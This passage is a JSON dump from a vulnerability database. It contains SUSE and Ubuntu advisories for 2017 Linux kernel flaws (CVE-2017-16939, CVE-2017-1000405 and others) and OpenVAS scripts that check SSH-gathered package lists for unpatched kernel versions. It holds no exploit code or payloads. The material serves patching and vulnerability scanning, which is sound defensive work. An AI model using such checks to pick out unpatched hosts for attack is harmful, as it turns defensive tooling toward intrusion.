the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T21:10:51", "published": "2017-12-14T21:10:51", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00058.html", "id": "SUSE-SU-2017:3314-1", "title": "Security update for the Linux Kernel (Live Patch 3 for SLE 12 SP3) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-12-14T17:35:25", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "This update for the Linux Kernel 4.4.74-92_29 fixes several issues.\n\n The following security issues were fixed:\n\n - CVE-2017-1000405: Problematic use of pmd_mkdirty() in the touch_pmd()\n function allowed users to overwrite read-only huge pages (e.g. 
the zero\n huge page and sealed shmem files) (bsc#1070307).\n - CVE-2017-16939: The XFRM dump policy implementation in\n net/xfrm/xfrm_user.c kernel allowed local users to gain privileges or\n cause a denial of service (use-after-free) via a crafted SO_RCVBUF\n setsockopt system call in conjunction with XFRM_MSG_GETPOLICY Netlink\n messages (bsc#1069708).\n\n This non-security issue was fixed:\n\n - bsc#1062847: Enable proper shut down if NIC teaming is enabled\n\n", "edition": 1, "modified": "2017-12-14T15:20:54", "published": "2017-12-14T15:20:54", "href": "http://lists.opensuse.org/opensuse-security-announce/2017-12/msg00045.html", "id": "SUSE-SU-2017:3300-1", "title": "Security update for the Linux Kernel (Live Patch 10 for SLE 12 SP2) (important)", "type": "suse", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "ubuntu": [{"lastseen": "2020-07-15T01:43:16", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "USN-3510-1 fixed vulnerabilities in the Linux kernel for Ubuntu 14.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 14.04 LTS for Ubuntu \n12.04 ESM.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. 
(CVE-2017-1000405)", "edition": 7, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3510-2", "href": "https://ubuntu.com/security/notices/USN-3510-2", "title": "Linux kernel (Trusty HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T01:39:15", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)", "edition": 6, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3510-1", "href": "https://ubuntu.com/security/notices/USN-3510-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-18T01:37:22", "bulletinFamily": "unix", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. 
(CVE-2017-1000405)", "edition": 6, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3511-1", "href": "https://ubuntu.com/security/notices/USN-3511-1", "title": "Linux kernel (Azure) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:44:10", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "description": "USN-3508-1 fixed vulnerabilities in the Linux kernel for Ubuntu 17.04. \nThis update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 17.04 for Ubuntu \n16.04 LTS.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nYonggang Guo discovered that a race condition existed in the driver \nsubsystem in the Linux kernel. A local attacker could use this to possibly \ngain administrative privileges. (CVE-2017-12146)", "edition": 5, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3508-2", "href": "https://ubuntu.com/security/notices/USN-3508-2", "title": "Linux kernel (HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-09T00:35:01", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. 
A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nYonggang Guo discovered that a race condition existed in the driver \nsubsystem in the Linux kernel. A local attacker could use this to possibly \ngain administrative privileges. (CVE-2017-12146)", "edition": 6, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3508-1", "href": "https://ubuntu.com/security/notices/USN-3508-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:38:13", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB \ndriver for the Linux kernel. 
A physically proximate attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. (CVE-2017-16643)", "edition": 6, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3509-1", "href": "https://ubuntu.com/security/notices/USN-3509-1", "title": "Linux kernel vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:37:56", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "USN-3509-2 fixed vulnerabilities in the Linux Hardware Enablement \nkernel for Ubuntu 14.04 LTS. Unfortunately, it also introduced a \nregression that prevented the Ceph network filesystem from being \nused. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB \ndriver for the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. 
(CVE-2017-16643)", "edition": 6, "modified": "2017-12-15T00:00:00", "published": "2017-12-15T00:00:00", "id": "USN-3509-4", "href": "https://ubuntu.com/security/notices/USN-3509-4", "title": "Linux kernel (Xenial HWE) regression", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:40:18", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "USN-3509-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. This update provides the corresponding updates for the Linux \nHardware Enablement (HWE) kernel from Ubuntu 16.04 LTS for Ubuntu \n14.04 LTS.\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB \ndriver for the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. 
(CVE-2017-16643)", "edition": 6, "modified": "2017-12-07T00:00:00", "published": "2017-12-07T00:00:00", "id": "USN-3509-2", "href": "https://ubuntu.com/security/notices/USN-3509-2", "title": "Linux kernel (Xenial HWE) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-02T11:34:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-12193", "CVE-2017-16939", "CVE-2017-16643", "CVE-2017-1000405"], "description": "USN-3509-1 fixed vulnerabilities in the Linux kernel for Ubuntu 16.04 \nLTS. Unfortunately, it also introduced a regression that prevented the \nCeph network filesystem from being used. This update fixes the problem.\n\nWe apologize for the inconvenience.\n\nOriginal advisory details:\n\nMohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nAndrey Konovalov discovered an out-of-bounds read in the GTCO digitizer USB \ndriver for the Linux kernel. A physically proximate attacker could use this \nto cause a denial of service (system crash) or possibly execute arbitrary \ncode. 
(CVE-2017-16643)", "edition": 6, "modified": "2017-12-15T00:00:00", "published": "2017-12-15T00:00:00", "id": "USN-3509-3", "href": "https://ubuntu.com/security/notices/USN-3509-3", "title": "Linux kernel regression", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-07-15T01:41:53", "bulletinFamily": "unix", "cvelist": ["CVE-2017-15306", "CVE-2017-15299", "CVE-2017-12193", "CVE-2017-15951", "CVE-2017-16939", "CVE-2017-1000405"], "description": "Mohamed Ghannam discovered that a use-after-free vulnerability existed in \nthe Netlink subsystem (XFRM) in the Linux kernel. A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-16939)\n\nIt was discovered that the Linux kernel did not properly handle copy-on- \nwrite of transparent huge pages. A local attacker could use this to cause a \ndenial of service (application crashes) or possibly gain administrative \nprivileges. (CVE-2017-1000405)\n\nFan Wu, Haoran Qiu, and Shixiong Zhao discovered that the associative array \nimplementation in the Linux kernel sometimes did not properly handle adding \na new entry. A local attacker could use this to cause a denial of service \n(system crash). (CVE-2017-12193)\n\nEric Biggers discovered that the key management subsystem in the Linux \nkernel did not properly restrict adding a key that already exists but is \nuninstantiated. A local attacker could use this to cause a denial of \nservice (system crash) or possibly execute arbitrary code. (CVE-2017-15299)\n\nIt was discovered that a null pointer dereference error existed in the \nPowerPC KVM implementation in the Linux kernel. A local attacker could use \nthis to cause a denial of service (system crash). (CVE-2017-15306)\n\nEric Biggers discovered a race condition in the key management subsystem of \nthe Linux kernel around keys in a negative state. 
A local attacker could \nuse this to cause a denial of service (system crash) or possibly execute \narbitrary code. (CVE-2017-15951)", "edition": 6, "modified": "2017-12-08T00:00:00", "published": "2017-12-08T00:00:00", "id": "USN-3507-2", "href": "https://ubuntu.com/security/notices/USN-3507-2", "title": "Linux kernel (GCP) vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "openvas": [{"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843393", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843393", "type": "openvas", "title": "Ubuntu Update for linux-azure USN-3511-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3511_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux-azure USN-3511-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843393\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:17 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux-azure USN-3511-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux-azure'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. 
A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405)\");\n script_tag(name:\"affected\", value:\"linux-azure on Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3511-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3511-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU16\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-4.11.0-1016-azure\", ver:\"4.11.0-1016.16\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-azure\", ver:\"4.11.0.1016.16\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:51", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-16939", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843394", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843394", "type": "openvas", "title": "Ubuntu Update for linux USN-3510-1", "sourceData": "###############################################################################\n# 
OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3510_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3510-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843394\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:23 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3510-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed 
in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405)\");\n script_tag(name:\"affected\", value:\"linux on Ubuntu 14.04 LTS\");\n script_tag(name:\"solution\", value:\"Please Install the Updated Packages.\");\n\n script_xref(name:\"USN\", value:\"3510-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3510-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU14\\.04 LTS\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU14.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-generic\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-generic-lpae\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-lowlatency\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc-e500\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n 
security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc-e500mc\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc-smp\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc64-emb\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-3.13.0-137-powerpc64-smp\", ver:\"3.13.0-137.186\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-generic-lpae\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-lowlatency\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-e500mc\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc-smp\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-emb\", ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"linux-image-powerpc64-smp\", 
ver:\"3.13.0.137.146\", rls:\"UBUNTU14.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:50", "bulletinFamily": "scanner", "cvelist": ["CVE-2017-12146", "CVE-2017-16939", "CVE-2017-1000405"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2017-12-08T00:00:00", "id": "OPENVAS:1361412562310843397", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843397", "type": "openvas", "title": "Ubuntu Update for linux USN-3508-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3508_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for linux USN-3508-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843397\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-12-08 07:04:49 +0100 (Fri, 08 Dec 2017)\");\n script_cve_id(\"CVE-2017-16939\", \"CVE-2017-1000405\", \"CVE-2017-12146\");\n script_tag(name:\"cvss_base\", value:\"7.2\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:L/AC:L/Au:N/C:C/I:C/A:C\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for linux USN-3508-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'linux'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"Mohamed Ghannam discovered that a\n use-after-free vulnerability existed in the Netlink subsystem (XFRM) in the\n Linux kernel. A local attacker could use this to cause a denial of service\n (system crash) or possibly execute arbitrary code. (CVE-2017-16939) It was\n discovered that the Linux kernel did not properly handle copy-on- write of\n transparent huge pages. A local attacker could use this to cause a denial of\n service (application crashes) or possibly gain administrative privileges.\n (CVE-2017-1000405) Yonggang Guo discovered that a race condition existed in the\n driver subsystem in the Linux kernel. A local attacker could use this to\n possibly gain administrative privileges. 
